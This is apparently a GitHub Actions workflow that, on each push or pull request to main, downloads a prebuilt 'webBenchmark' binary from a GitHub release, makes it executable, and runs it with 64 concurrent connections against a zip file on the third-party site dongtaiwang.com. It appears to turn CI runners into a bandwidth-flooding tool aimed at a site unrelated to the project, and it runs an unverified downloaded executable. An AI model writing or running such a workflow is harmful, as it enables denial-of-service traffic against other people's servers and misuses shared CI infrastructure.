name: Tar
on:
  push:
    branches: [ "main" ]
  pull_request:
    branches: [ "main" ]
jobs:
  develop:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3


      - name: solid
        run: |
         wget https://github.com/maintell/webBenchmark/releases/download/0.5/webBenchmark_linux_x64
         chmod +x webBenchmark_linux_x64
         ./webBenchmark_linux_x64 -c 64 -s https://dongtaiwang.com/dl/freenews/64/64txt/TamPic.zip
         